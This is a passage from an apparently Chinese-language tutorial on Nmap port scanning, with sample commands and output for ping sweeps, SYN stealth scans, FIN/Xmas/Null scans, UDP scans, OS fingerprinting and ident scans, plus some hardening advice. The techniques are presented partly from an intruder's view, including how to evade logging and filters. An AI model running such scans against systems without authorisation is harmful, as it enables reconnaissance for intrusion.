\u4e3b\u673a\u5bf9\u4efb\u4f55\u4e00\u79cd\u7684\u54cd\u5e94\u90fd\u4f1a\u88abNmap\u5f97\u5230\u3002<br>\u4e3e\u4f8b\uff1a\u626b\u63cf192.168.7.0\u7f51\u7edc\uff1a&nbsp;<\/p>\n\n\n<pre class=\"wp-block-code\"><code># nmap -sP 192.168.7.0\/24 \n\nStarting nmap V. 2.12 by Fyodor (fyodor@dhp.com, www.insecure.org\/nmap\/) \nHost (192.168.7.11) appears to be up. \nHost (192.168.7.12) appears to be up. \nHost (192.168.7.76) appears to be up. \nNmap run completed -- 256 IP addresses (3 hosts up) scanned in 1 second <\/code><\/pre>\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u4e0d\u53d1\u9001ICMP echo\u8bf7\u6c42\uff0c\u4f46\u8981\u68c0\u67e5\u7cfb\u7edf\u7684\u53ef\u7528\u6027\uff0c\u8fd9\u79cd\u626b\u63cf\u53ef\u80fd\u5f97\u4e0d\u5230\u4e00\u4e9b\u7ad9\u70b9\u7684\u54cd\u5e94\u3002\u5728\u8fd9\u79cd\u60c5\u51b5\u4e0b\uff0c\u4e00\u4e2aTCP&quot;ping&quot;\u5c31\u53ef\u7528\u4e8e\u626b\u63cf\u76ee\u6807\u7f51\u7edc\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4e00\u4e2aTCP&quot;ping&quot;\u5c06\u53d1\u9001\u4e00\u4e2aACK\u5230\u76ee\u6807\u7f51\u7edc\u4e0a\u7684\u6bcf\u4e2a\u4e3b\u673a\u3002\u7f51\u7edc\u4e0a\u7684\u4e3b\u673a\u5982\u679c\u5728\u7ebf\uff0c\u5219\u4f1a\u8fd4\u56de\u4e00\u4e2aTCP RST\u54cd\u5e94\u3002\u4f7f\u7528\u5e26\u6709ping\u626b\u63cf\u7684TCPping\u9009\u9879\uff0c\u4e5f\u5c31\u662f&quot;PT&quot;\u9009\u9879\u53ef\u4ee5\u5bf9\u7f51\u7edc\u4e0a\u6307\u5b9a\u7aef\u53e3\u8fdb\u884c\u626b\u63cf(\u672c\u6587\u4f8b\u5b50\u4e2d\u6307\u7684\u7f3a\u7701\u7aef\u53e3\u662f80\uff08http\uff09\u53f7\u7aef\u53e3)\uff0c\u5b83\u5c06\u53ef\u80fd\u901a\u8fc7\u76ee\u6807\u8fb9\u754c\u8def\u7531\u5668\u751a\u81f3\u662f\u9632\u706b\u5899\u3002\u6ce8\u610f\uff0c\u88ab\u63a2\u6d4b\u7684\u4e3b\u673a\u4e0a\u7684\u76ee\u6807\u7aef\u53e3\u65e0\u987b\u6253\u5f00\uff0c\u5173\u952e\u53d6\u51b3\u4e8e\u662f\u5426\u5728\u7f51\u7edc\u4e0a\u3002<\/p>\n\n\n<pre class=\"wp-block-code\"><code># nmap -sP -PT80 192.168.7.0\/24 \nTCP probe port is 80 \n\nStarting nmap V. 2.12 by Fyodor (fyodor@dhp.com, www.insecure.org\/nmap\/) \nHost (192.168.7.11) appears to be up. \nHost (192.168.7.12) appears to be up. \nHost (192.168.7.76) appears to be up. \nNmap run completed -- 256 IP addresses (3 hosts up) scanned in 1 second <\/code><\/pre>\n\n\n<p class=\"wp-block-paragraph\">\u5f53\u6f5c\u5728\u5165\u4fb5\u8005\u53d1\u73b0\u4e86\u5728\u76ee\u6807\u7f51\u7edc\u4e0a\u8fd0\u884c\u7684\u4e3b\u673a\uff0c\u4e0b\u4e00\u6b65\u662f\u8fdb\u884c\u7aef\u53e3\u626b\u63cf\u3002<br>Nmap\u652f\u6301\u4e0d\u540c\u7c7b\u522b\u7684\u7aef\u53e3\u626b\u63cfTCP\u8fde\u63a5, TCP SYN, Stealth FIN, Xmas Tree,Null\u548cUDP\u626b\u63cf\u3002<\/p>\n\n\n<h2 class=\"wp-block-heading\">\u7aef\u53e3\u626b\u63cf(Port Scanning)<\/h2>\n\n\n<p class=\"wp-block-paragraph\"><strong>\u4e00\u4e2a\u653b\u51fb\u8005\u4f7f\u7528TCP\u8fde\u63a5\u626b\u63cf\u5f88\u5bb9\u6613\u88ab\u53d1\u73b0<\/strong>\uff0c\u56e0\u4e3aNmap\u5c06\u4f7f\u7528connect()\u7cfb\u7edf\u8c03\u7528\u6253\u5f00\u76ee\u6807\u673a\u4e0a\u76f8\u5173\u7aef\u53e3\u7684\u8fde\u63a5\uff0c\u5e76\u5b8c\u6210\u4e09\u6b21TCP\u63e1\u624b\u3002\u9ed1\u5ba2\u767b\u5f55\u5230\u4e3b\u673a\u5c06\u663e\u793a\u5f00\u653e\u7684\u7aef\u53e3\u3002\u4e00\u4e2atcp\u8fde\u63a5\u626b\u63cf\u4f7f\u7528&quot;-sT&quot;\u547d\u4ee4\u5982\u4e0b\u3002<\/p>\n\n\n<pre class=\"wp-block-code\"><code># nmap -sT 192.168.7.12 \nStarting nmap V. 2.12 by Fyodor (fyodor@dhp.com, www.insecure.org\/nmap\/) \nInteresting ports on (192.168.7.12): \nPort State Protocol Service \n7 open tcp echo \n9 open tcp discard \n13 open tcp daytime \n19 open tcp chargen \n21 open tcp ftp <\/code><\/pre>\n\n\n<h2 class=\"wp-block-heading\">\u9690\u853d\u626b\u63cf(Stealth Scanning)<\/h2>\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u4e00\u4e2a\u653b\u51fb\u8005\u4e0d\u613f\u5728\u626b\u63cf\u65f6\u4f7f\u5176\u4fe1\u606f\u88ab\u8bb0\u5f55\u5728\u76ee\u6807\u7cfb\u7edf\u65e5\u5fd7\u4e0a\uff0cTCPSYN\u626b\u63cf\u53ef\u5e2e\u4f60\u7684\u5fd9\uff0c\u5b83\u5f88\u5c11\u4f1a\u5728\u76ee\u6807\u673a\u4e0a\u7559\u4e0b\u8bb0\u5f55\uff0c\u4e09\u6b21\u63e1\u624b\u7684\u8fc7\u7a0b\u4ece\u6765\u90fd\u4e0d\u4f1a\u5b8c\u5168\u5b9e\u73b0\u3002\u901a\u8fc7\u53d1\u9001\u4e00\u4e2aSYN\u5305\uff08\u662fTCP\u534f\u8bae\u4e2d\u7684\u7b2c\u4e00\u4e2a\u5305\uff09\u5f00\u59cb\u4e00\u6b21SYN\u7684\u626b\u63cf\u3002\u4efb\u4f55\u5f00\u653e\u7684\u7aef\u53e3\u90fd\u5c06\u6709\u4e00\u4e2aSYN|ACK\u54cd\u5e94\u3002\u7136\u800c\uff0c\u653b\u51fb\u8005\u53d1\u9001\u4e00\u4e2aRST\u66ff\u4ee3ACK\uff0c\u8fde\u63a5\u4e2d\u6b62\u3002\u4e09\u6b21\u63e1\u624b\u5f97\u4e0d\u5230\u5b9e\u73b0\uff0c\u4e5f\u5c31\u5f88\u5c11\u6709\u7ad9\u70b9\u80fd\u8bb0\u5f55\u8fd9\u6837\u7684\u63a2\u6d4b\u3002\u5982\u679c\u662f\u5173\u95ed\u7684\u7aef\u53e3\uff0c\u5bf9\u6700\u521d\u7684SYN\u4fe1\u53f7\u7684\u54cd\u5e94\u4e5f\u4f1a\u662fRST\uff0c\u8ba9NMAP\u77e5\u9053\u8be5\u7aef\u53e3\u4e0d\u5728\u76d1\u542c\u3002&quot;-sS&quot;\u547d\u4ee4\u5c06\u53d1\u9001\u4e00\u4e2aSYN\u626b\u63cf\u63a2\u6d4b\u4e3b\u673a\u6216\u7f51\u7edc\uff1a<\/p>\n\n\n<pre class=\"wp-block-code\"><code># nmap -sS 192.168.7.7 \n\nStarting nmap V. 2.12 by Fyodor (fyodor@dhp.com, www.insecure.org\/nmap\/) \nInteresting ports on saturnlink.nac.net (192.168.7.7): \nPort State Protocol Service \n21 open tcp ftp \n25 open tcp smtp \n53 open tcp domain \n80 open tcp http \n... \nNmap run completed -- 1 IP address (1 host up) scanned in 1 second <\/code><\/pre>\n\n\n<p class=\"wp-block-paragraph\">\u867d\u7136SYN\u626b\u63cf\u53ef\u80fd\u4e0d\u88ab\u6ce8\u610f\uff0c\u4f46\u4ed6\u4eec\u4ecd\u4f1a\u88ab\u4e00\u4e9b\u5165\u4fb5\u68c0\u6d4b\u7cfb\u7edf\u6355\u6349\u3002Stealth FIN\uff0cXmas\u6811\u548cNullscans\u53ef\u7528\u4e8e\u8eb2\u907f\u5305\u8fc7\u6ee4\u548c\u53ef\u68c0\u6d4b\u8fdb\u5165\u53d7\u9650\u5236\u7aef\u53e3\u7684SYN\u5305\u3002\u8fd9\u4e09\u4e2a\u626b\u63cf\u5668\u5bf9\u5173\u95ed\u7684\u7aef\u53e3\u8fd4\u56deRST\uff0c\u5bf9\u5f00\u653e\u7684\u7aef\u53e3\u5c06\u5438\u6536\u5305\u3002\u4e00\u4e2a FIN&quot;-sF&quot;\u626b\u63cf\u5c06\u53d1\u9001\u4e00\u4e2aFIN\u5305\u5230\u6bcf\u4e2a\u7aef\u53e3\u3002<br>\u7136\u800cXmas\u626b\u63cf&quot;-sX&quot;\u6253\u5f00FIN, URG\u548cPUSH\u7684\u6807\u5fd7\u4f4d\uff0c\u4e00\u4e2aNull scans &quot;-sN&quot;\u5173\u95ed\u6240\u6709\u7684\u6807\u5fd7\u4f4d\u3002\u56e0\u4e3a\u5fae\u8f6f\u4e0d\u652f\u6301TCP\u6807\u51c6\uff0c\u6240\u4ee5FIN, Xmas Tree\u548cNull scans\u5728\u975e\u5fae\u8f6f\u516c\u53f8\u7684\u64cd\u4f5c\u7cfb\u7edf\u4e0b\u624d\u6709\u6548\u3002<\/p>\n\n\n<h2 class=\"wp-block-heading\">UDP\u626b\u63cf(UDP Scanning)<\/h2>\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u4e00\u4e2a\u653b\u51fb\u8005\u5bfb\u627e\u4e00\u4e2a\u6d41\u884c\u7684UDP\u6f0f\u6d1e\uff0c\u6bd4\u5982 rpcbind\u6f0f\u6d1e\u6216cDc Backorifice\u3002\u4e3a\u4e86\u67e5\u51fa\u54ea\u4e9b\u7aef\u53e3\u5728\u76d1\u542c\uff0c\u5219\u8fdb\u884cUDP\u626b\u63cf\uff0c\u5373\u53ef\u77e5\u54ea\u4e9b\u7aef\u53e3\u5bf9UDP\u662f\u5f00\u653e\u7684\u3002Nmap\u5c06\u53d1\u9001\u4e00\u4e2aO\u5b57\u8282\u7684UDP\u5305\u5230\u6bcf\u4e2a\u7aef\u53e3\u3002\u5982\u679c\u4e3b\u673a\u8fd4\u56de\u7aef\u53e3\u4e0d\u53ef\u8fbe\uff0c\u5219\u8868\u793a\u7aef\u53e3\u662f\u5173\u95ed\u7684\u3002\u4f46\u8fd9\u79cd\u65b9\u6cd5\u53d7\u5230\u65f6\u95f4\u7684\u9650\u5236\uff0c\u56e0\u4e3a\u5927\u591a\u6570\u7684UNIX\u4e3b\u673a\u9650\u5236ICMP\u9519\u8bef\u901f\u7387\u3002\u5e78\u8fd0\u7684\u662f\uff0cNmap\u672c\u8eab\u68c0\u6d4b\u8fd9\u79cd\u901f\u7387\u5e76\u81ea\u8eab\u51cf\u901f\uff0c\u4e5f\u5c31\u4e0d\u4f1a\u4ea7\u751f\u6ea2\u51fa\u4e3b\u673a\u7684\u60c5\u51b5\u3002<\/p>\n\n\n<pre class=\"wp-block-code\"><code># nmap -sU 192.168.7.7 \n\nWARNING: -sU is now UDP scan -- for TCP FIN scan use -sF \nStarting nmap V. 2.12 by Fyodor (fyodor@dhp.com, www.insecure.org\/nmap\/) \nInteresting ports on saturnlink.nac.net (192.168.7.7): \nPort State Protocol Service \n53 open udp domain \n111 open udp sunrpc \n123 open udp ntp \n137 open udp netbios-ns \n138 open udp netbios-dgm \n177 open udp xdmcp \n1024 open udp unknown \n\nNmap run completed -- 1 IP address (1 host up) scanned in 2 seconds <\/code><\/pre>\n\n\n<h2 class=\"wp-block-heading\">\u64cd\u4f5c\u7cfb\u7edf\u8bc6\u522b(OS Fingerprinting)<\/h2>\n\n\n<p class=\"wp-block-paragraph\">\u901a\u5e38\u4e00\u4e2a\u5165\u4fb5\u8005\u53ef\u80fd\u5bf9\u67d0\u4e2a\u64cd\u4f5c\u7cfb\u7edf\u7684\u6f0f\u6d1e\u5f88\u719f\u6089\uff0c\u80fd\u5f88\u8f7b\u6613\u5730\u8fdb\u5165\u6b64\u64cd\u4f5c\u7cfb\u7edf\u7684\u673a\u5668\u3002\u4e00\u4e2a\u5e38\u89c1\u7684\u9009\u9879\u662fTCP\/IP\u4e0a\u7684\u6307\u7eb9\uff0c\u5e26\u6709&quot;-O&quot;\u9009\u9879\u51b3\u5b9a\u8fdc\u7a0b\u64cd\u4f5c\u7cfb\u7edf\u7684\u7c7b\u578b\u3002\u8fd9\u53ef\u4ee5\u548c\u4e00\u4e2a\u7aef\u53e3\u626b\u63cf\u7ed3\u5408\u4f7f\u7528\uff0c\u4f46\u4e0d\u80fd\u548cping\u626b\u63cf\u7ed3\u5408\u4f7f\u7528\u3002Nmap\u901a\u8fc7\u5411\u4e3b\u673a\u53d1\u9001\u4e0d\u540c\u7c7b\u578b\u7684\u63a2\u6d4b\u4fe1\u53f7\uff0c\u7f29\u5c0f\u67e5\u627e\u7684\u64cd\u4f5c\u7cfb\u7edf\u7cfb\u7edf\u7684\u8303\u56f4\u3002\u6307\u7eb9\u9a8c\u8bc1TCP\u5305\u62ec\u4f7f\u7528FIN\u63a2\u6d4b\u6280\u672f\u53d1\u73b0\u76ee\u6807\u673a\u7684\u54cd\u5e94\u7c7b\u578b\u3002BOGUS\u7684\u6807\u5fd7\u63a2\u6d4b\uff0c\u53d1\u73b0\u8fdc\u7a0b\u4e3b\u673a\u5bf9\u53d1\u9001\u7684\u5e26\u6709SYN\u5305\u7684\u4e0d\u660e\u6807\u5fd7\u7684\u53cd\u5e94\uff0cTCP\u521d\u59cb\u5e8f\u5217\u53f7(ISN)\u53d6\u6837\u53d1\u73b0ISN\u6570\u503c\u7684\u6837\u5f0f\uff0c\u4e5f\u53ef\u4ee5\u7528\u53e6\u5916\u7684\u65b9\u5f0f\u51b3\u5b9a\u8fdc\u7a0b\u64cd\u4f5c\u7cfb\u7edf\u3002\u6709\u4e00\u7bc7\u6743\u5a01\u7684\u5173\u4e8e\u6307\u7eb9\uff08fingertprinting\uff09\u7684\u6587\u7ae0,\u4f5c\u8005\uff1aFyodor\uff0c\u4e5f\u662fnamp\u7684\u4f5c\u8005\uff0c\u53c2\u89c1\u5730\u5740\uff1a<a href=\"https:\/\/byy3.com\/go\/?url=http:\/\/www.insecure.org\/nmap\/nmap-fingerprinting-article.html\" rel=\"nofollow\" >http:\/\/www.insecure.org\/nmap\/nmap-fingerprinting-article.html<\/a><\/p>\n\n\n<p class=\"wp-block-paragraph\">Nmap's\u64cd\u4f5c\u7cfb\u7edf\u7684\u68c0\u6d4b\u662f\u5f88\u51c6\u786e\u4e5f\u662f\u5f88\u6709\u6548\u7684\uff0c\u4e3e\u4f8b\uff1a\u4f7f\u7528\u7cfb\u7edfSolaris 2.7\u5e26\u6709SYN\u626b\u63cf\u7684\u6307\u7eb9\u9a8c\u8bc1\u5806\u6808\u3002<\/p>\n\n\n<pre class=\"wp-block-code\"><code># nmap -sS -O 192.168.7.12 \n\nStarting nmap V. 2.12 by Fyodor (fyodor@dhp.com, www.insecure.org\/nmap\/) \nInteresting ports on comet (192.168.7.12): \nPort State Protocol Service \n7 open tcp echo \n9 open tcp discard \n13 open tcp daytime \n19 open tcp chargen \n21 open tcp ftp \n... \nTCP Sequence Prediction: Class=random positive increments \nDifficulty=17818 (Worthy challenge) \nRemote operating system guess: Solaris 2.6 - 2.7 \n\nNmap run completed -- 1 IP address (1 host up) scanned in 5 seconds <\/code><\/pre>\n\n\n<h2 class=\"wp-block-heading\">Ident\u626b\u63cf\uff08Ident Scanning\uff09<\/h2>\n\n\n<p class=\"wp-block-paragraph\">\u4e00\u4e2a\u653b\u51fb\u8005\u5e38\u5e38\u5bfb\u627e\u4e00\u53f0\u5bf9\u4e8e\u67d0\u4e9b\u8fdb\u7a0b\u5b58\u5728\u6f0f\u6d1e\u7684\u7535\u8111\u3002\u6bd4\u5982,\u4e00\u4e2a\u4ee5root\u8fd0\u884c\u7684WEB\u670d\u52a1\u5668\u3002\u5982\u679c\u76ee\u6807\u673a\u8fd0\u884c\u4e86identd,\u4e00\u4e2a\u653b\u51fb\u8005\u4f7f\u7528Nmap\u901a\u8fc7&quot;-I&quot;\u9009\u9879\u7684TCP\u8fde\u63a5,\u5c31\u53ef\u4ee5\u53d1\u73b0\u54ea\u4e2a\u7528\u6237\u62e5\u6709http\u5b88\u62a4\u8fdb\u7a0b\u3002\u6211\u4eec\u5c06\u626b\u63cf\u4e00\u4e2aLinux WEB\u670d\u52a1\u5668\u4e3a\u4f8b\uff1a<\/p>\n\n\n<pre class=\"wp-block-code\"><code># nmap -sT -p 80 -I -O www.yourserver.com \n\nStarting nmap V. 2.12 by Fyodor (fyodor@dhp.com, www.insecure.org\/nmap\/) \nInteresting ports on www.yourserver.com (xxx.xxx.xxx.xxx): \nPort\n\nState Protocol Service Owner \n80 open tcp http root \n\nTCP Sequence Prediction: Class=random positive increments \nDifficulty=1140492 (Good luck!) \nRemote operating system guess: Linux 2.1.122 - 2.1.132; 2.2.0-pre1 - 2.2.2 \n\nNmap run completed -- 1 IP address (1 host up) scanned in 1 second <\/code><\/pre>\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u4f60\u7684WEB\u670d\u52a1\u5668\u662f\u9519\u8bef\u7684\u914d\u7f6e\u5e76\u4ee5root\u6765\u8fd0\u884c\uff0c\u8c61\u4e0a\u4f8b\u4e00\u6837\uff0c\u5b83\u5c06\u662f\u9ece\u660e\u524d\u7684\u9ed1\u6697\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">Apache\u8fd0\u884c\u5728root\u4e0b\uff0c\u662f\u4e0d\u5b89\u5168\u7684\u5b9e\u8df5\uff0c\u4f60\u53ef\u4ee5\u901a\u8fc7\u628a\/etc\/indeed.conf\u4e2d\u7684auth\u670d\u52a1\u6ce8\u9500\u6765\u963b\u6b62ident\u8bf7\u6c42\uff0c\u5e76\u91cd\u65b0\u542f\u52a8ident\u3002\u53e6\u5916\u4e5f\u53ef\u7528\u4f7f\u7528ipchains\u6216\u4f60\u7684\u6700\u5e38\u7528\u7684\u9632\u706b\u5899\uff0c\u5728\u7f51\u7edc\u8fb9\u754c\u4e0a\u6267\u884c\u9632\u706b\u5899\u89c4\u5219\u6765\u7ec8\u6b62ident\u8bf7\u6c42\uff0c\u8fd9\u53ef\u4ee5\u963b\u6b62\u6765\u8def\u4e0d\u660e\u7684\u4eba\u63a2\u6d4b\u4f60\u7684\u7f51\u7ad9\u7528\u6237\u62e5\u6709\u54ea\u4e9b\u8fdb\u7a0b\u3002<\/p>\n\n\n<h1 class=\"wp-block-heading\">\u7aef\u53e3\u626b\u63cf\u6280\u672f<\/h1>\n\n\n<p class=\"wp-block-paragraph\">\u4f5c\u4e3a\u4e00\u4e2a\u4fee\u8f66\u65b0\u624b\uff0c\u6211\u53ef\u80fd\u6298\u817e\u51e0\u4e2a\u5c0f\u65f6\u6765\u6478\u7d22\u600e\u6837\u628a\u57fa\u672c\u5de5\u5177(\u9524\u5b50\uff0c\u80f6\u5e26\uff0c\u6273\u5b50\u7b49) \u7528\u4e8e\u624b\u5934\u7684\u4efb\u52a1\u3002\u5f53\u6211\u60e8\u75db\u5730\u5931\u8d25\uff0c\u628a\u6211\u7684\u8001\u7237\u8f66\u62d6\u5230\u4e00\u4e2a\u771f\u6b63\u7684\u6280\u5e08\u90a3\u513f\u7684\u65f6\u5019 \uff0c\u4ed6\u603b\u662f\u5728\u4ed6\u7684\u5de5\u5177\u7bb1\u91cc\u7ffb\u6765\u7ffb\u53bb\uff0c\u76f4\u5230\u62fd\u51fa\u4e00\u4e2a\u5b8c\u7f8e\u7684\u5de5\u5177\u7136\u540e\u4f3c\u4e4e\u4e0d\u8d39\u5439\u7070\u4e4b\u529b\u641e\u5b9a\u5b83\u3002 \u7aef\u53e3\u626b\u63cf\u7684\u827a\u672f\u548c\u8fd9\u4e2a\u7c7b\u4f3c\u3002\u4e13\u5bb6\u7406\u89e3\u6210\u6253\u7684\u626b\u63cf\u6280\u672f\uff0c\u9009\u62e9\u6700\u9002\u5408\u7684\u4e00\u79cd (\u6216\u8005\u7ec4\u5408)\u6765\u5b8c\u6210\u7ed9\u5b9a\u7684 \u4efb\u52a1\u3002 \u53e6\u4e00\u65b9\u9762\uff0c\u6ca1\u6709\u7ecf\u9a8c\u7684\u7528\u6237\u548c\u521a\u5165\u95e8\u8005\u603b\u662f\u7528\u9ed8\u8ba4\u7684SYN\u626b\u63cf\u89e3\u51b3\u6bcf\u4e2a\u95ee\u9898\u3002 \u65e2\u7136Nmap\u662f\u514d\u8d39\u7684\uff0c\u638c\u63e1\u7aef\u53e3\u626b\u63cf\u7684\u552f\u4e00\u969c\u788d\u5c31\u662f\u77e5\u8bc6\u3002\u8fd9\u5f53\u7136\u662f\u6c7d\u8f66\u4e16\u754c\u6240\u4e0d\u80fd\u6bd4\u7684\uff0c \u5728\u90a3\u91cc\uff0c\u53ef\u80fd\u9700\u8981\u9ad8\u8d85\u7684\u6280\u5de7\u624d\u80fd\u786e\u5b9a\u60a8\u9700\u8981\u4e00\u4e2a\u538b\u6746\u5f39\u7c27\u538b\u7f29\u673a\uff0c\u63a5\u7740\u60a8\u8fd8\u5f97\u4e3a\u5b83\u4ed8\u6570\u5343\u7f8e\u91d1\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5927\u90e8\u5206\u626b\u63cf\u7c7b\u578b\u53ea\u5bf9\u7279\u6743\u7528\u6237\u53ef\u7528\u3002 \u8fd9\u662f\u56e0\u4e3a\u4ed6\u4eec\u53d1\u9001\u63a5\u6536\u539f\u59cb\u62a5\u6587\uff0c\u8fd9\u5728Unix\u7cfb\u7edf\u9700\u8981root\u6743\u9650\u3002 \u5728Windows\u4e0a\u63a8\u8350\u4f7f\u7528administrator\u8d26\u6237\uff0c\u4f46\u662f\u5f53WinPcap\u5df2\u7ecf\u88ab\u52a0\u8f7d\u5230\u64cd\u4f5c\u7cfb\u7edf\u65f6\uff0c \u975e\u7279\u6743\u7528\u6237\u4e5f\u53ef\u4ee5\u6b63\u5e38\u4f7f\u7528Nmap\u3002\u5f53Nmap\u57281997\u5e74\u53d1\u5e03\u65f6\uff0c\u9700\u8981root\u6743\u9650\u662f\u4e00\u4e2a\u4e25\u91cd\u7684 \u5c40\u9650\uff0c\u56e0\u4e3a\u5f88\u591a\u7528\u6237\u53ea\u6709\u5171\u4eab\u7684shell\u8d26\u6237\u3002\u73b0\u5728\uff0c\u4e16\u754c\u53d8\u4e86\uff0c\u8ba1\u7b97\u673a\u4fbf\u5b9c\u4e86\uff0c\u66f4\u591a\u4eba\u62e5\u6709\u4e92\u8054\u7f51\u8fde\u63a5 \uff0c\u684c\u9762UNIX\u7cfb\u7edf (\u5305\u62ecLinux\u548cMAC OS X)\u5f88\u666e\u904d\u4e86\u3002Windows\u7248\u672c\u7684Nmap\u73b0\u5728\u4e5f\u6709\u4e86\uff0c\u8fd9\u4f7f\u5b83\u53ef\u4ee5\u8fd0\u884c\u5728\u66f4\u591a\u7684\u684c\u9762\u4e0a\u3002 \u7531\u4e8e\u6240\u6709\u8fd9\u4e9b\u539f\u56e0\uff0c\u7528\u6237\u4e0d\u518d\u9700\u8981\u7528\u6709\u9650\u7684\u5171\u4eabshell\u8d26\u6237\u8fd0\u884cNmap\u3002 \u8fd9\u662f\u5f88\u5e78\u8fd0\u7684\uff0c\u56e0\u4e3a\u7279\u6743\u9009\u9879\u8ba9Nmap\u5f3a\u5927\u5f97\u591a\u4e5f\u7075\u6d3b\u5f97\u591a\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u867d\u7136Nmap\u52aa\u529b\u4ea7\u751f\u6b63\u786e\u7684\u7ed3\u679c\uff0c\u4f46\u8bf7\u8bb0\u4f4f\u6240\u6709\u7ed3\u679c\u90fd\u662f\u57fa\u4e8e\u76ee\u6807\u673a\u5668(\u6216\u8005\u5b83\u4eec\u524d\u9762\u7684\u9632\u706b\u5899)\u8fd4\u56de\u7684\u62a5\u6587\u7684\u3002 \u3002\u8fd9\u4e9b\u4e3b\u673a\u4e5f\u8bb8\u662f\u4e0d\u503c\u5f97\u4fe1\u4efb\u7684\uff0c\u5b83\u4eec\u53ef\u80fd\u54cd\u5e94\u4ee5\u8ff7\u60d1\u6216\u8bef\u5bfcNmap\u7684\u62a5\u6587\u3002 \u66f4\u666e\u904d\u7684\u662f\u975eRFC\u517c\u5bb9\u7684\u4e3b\u673a\u4ee5\u4e0d\u6b63\u786e\u7684\u65b9\u5f0f\u54cd\u5e94Nmap\u63a2\u6d4b\u3002FIN\uff0cNull\u548cXmas\u626b\u63cf \u7279\u522b\u5bb9\u6613\u9047\u5230\u8fd9\u4e2a\u95ee\u9898\u3002\u8fd9\u4e9b\u662f\u7279\u5b9a\u626b\u63cf\u7c7b\u578b\u7684\u95ee\u9898\uff0c\u56e0\u6b64\u6211\u4eec\u5728\u4e2a\u522b\u626b\u63cf\u7c7b\u578b\u91cc\u8ba8\u8bba\u5b83\u4eec\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e00\u8282\u8ba8\u8bbaNmap\u652f\u6301\u7684\u5927\u7ea6\u5341\u51e0\u79cd\u626b\u63cf\u6280\u672f\u3002 \u4e00\u822c\u4e00\u6b21\u53ea\u7528\u4e00\u79cd\u65b9\u6cd5\uff0c \u9664\u4e86UDP\u626b\u63cf(<code>-sU<\/code>)\u53ef\u80fd\u548c\u4efb\u4f55\u4e00\u79cdTCP\u626b\u63cf\u7c7b\u578b\u7ed3\u5408\u4f7f\u7528\u3002 \u53cb\u60c5\u63d0\u793a\u4e00\u4e0b\uff0c\u7aef\u53e3\u626b\u63cf\u7c7b\u578b\u7684\u9009\u9879\u683c\u5f0f\u662f<code>-s<em><code>&lt;C&gt;<\/code><\/em><\/code>\uff0c \u5176\u4e2d<em><code>&lt;C&gt;<\/code><\/em>&nbsp;\u662f\u4e2a\u663e\u773c\u7684\u5b57\u7b26\uff0c\u901a\u5e38\u662f\u7b2c\u4e00\u4e2a\u5b57\u7b26\u3002 \u4e00\u4e2a\u4f8b\u5916\u662fdeprecated FTP bounce\u626b\u63cf(<code>-b<\/code>)\u3002\u9ed8\u8ba4\u60c5\u51b5\u4e0b\uff0cNmap\u6267\u884c\u4e00\u4e2a SYN\u626b\u63cf\uff0c\u4f46\u662f\u5982\u679c\u7528\u6237\u6ca1\u6709\u6743\u9650\u53d1\u9001\u539f\u59cb\u62a5\u6587(\u5728UNIX\u4e0a\u9700\u8981root\u6743\u9650)\u6216\u8005\u5982\u679c\u6307\u5b9a\u7684\u662fIPv6\u76ee\u6807\uff0cNmap\u8c03\u7528connect()\u3002 \u672c\u8282\u5217\u51fa\u7684\u626b\u63cf\u4e2d\uff0c\u975e\u7279\u6743\u7528\u6237\u53ea\u80fd\u6267\u884cconnect()\u548cftp bounce\u626b\u63cf\u3002<code>-sS<\/code>&nbsp;(TCP SYN\u626b\u63cf)<\/p>\n\n\n<p class=\"wp-block-paragraph\">SYN\u626b\u63cf\u4f5c\u4e3a\u9ed8\u8ba4\u7684\u4e5f\u662f\u6700\u53d7\u6b22\u8fce\u7684\u626b\u63cf\u9009\u9879\uff0c\u662f\u6709\u5145\u5206\u7406\u7531\u7684\u3002 \u5b83\u6267\u884c\u5f97\u5f88\u5feb\uff0c\u5728\u4e00\u4e2a\u6ca1\u6709\u5165\u4fb5\u9632\u706b\u5899\u7684\u5feb\u901f\u7f51\u7edc\u4e0a\uff0c\u6bcf\u79d2\u949f\u53ef\u4ee5\u626b\u63cf\u6570\u5343\u4e2a \u7aef\u53e3\u3002 SYN\u626b\u63cf\u76f8\u5bf9\u6765\u8bf4\u6bd4\u8f83\u9690\u853d\uff0c\u4e0d\u6613\u88ab\u6ce8\u610f\u5230\uff0c\u56e0\u4e3a\u5b83\u4ece\u6765\u4e0d\u5b8c\u6210TCP\u8fde\u63a5\u3002 \u5b83\u4e5f\u4e0d\u50cfFin\/Null\/Xmas\uff0cMaimon\u548cIdle\u626b\u63cf\u4f9d\u8d56\u4e8e\u7279\u5b9a\u5e73\u53f0\uff0c\u800c\u53ef\u4ee5\u5e94\u5bf9\u4efb\u4f55\u517c\u5bb9\u7684 TCP\u534f\u8bae\u6808\u3002 \u5b83\u8fd8\u53ef\u4ee5\u660e\u786e\u53ef\u9760\u5730\u533a\u5206<code>open<\/code>(\u5f00\u653e\u7684)\uff0c&nbsp;<code>closed<\/code>(\u5173\u95ed\u7684)\uff0c\u548c<code>filtered<\/code>(\u88ab\u8fc7\u6ee4\u7684) \u72b6\u6001<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5b83\u5e38\u5e38\u88ab\u79f0\u4e3a\u534a\u5f00\u653e\u626b\u63cf\uff0c \u56e0\u4e3a\u5b83\u4e0d\u6253\u5f00\u4e00\u4e2a\u5b8c\u5168\u7684TCP\u8fde\u63a5\u3002\u5b83\u53d1\u9001\u4e00\u4e2aSYN\u62a5\u6587\uff0c \u5c31\u50cf\u60a8\u771f\u7684\u8981\u6253\u5f00\u4e00\u4e2a\u8fde\u63a5\uff0c\u7136\u540e\u7b49\u5f85\u54cd\u5e94\u3002 SYN\/ACK\u8868\u793a\u7aef\u53e3\u5728\u76d1\u542c (\u5f00\u653e)\uff0c\u800c RST (\u590d\u4f4d)\u8868\u793a\u6ca1\u6709\u76d1\u542c\u8005\u3002\u5982\u679c\u6570\u6b21\u91cd\u53d1\u540e\u4ecd\u6ca1\u54cd\u5e94\uff0c 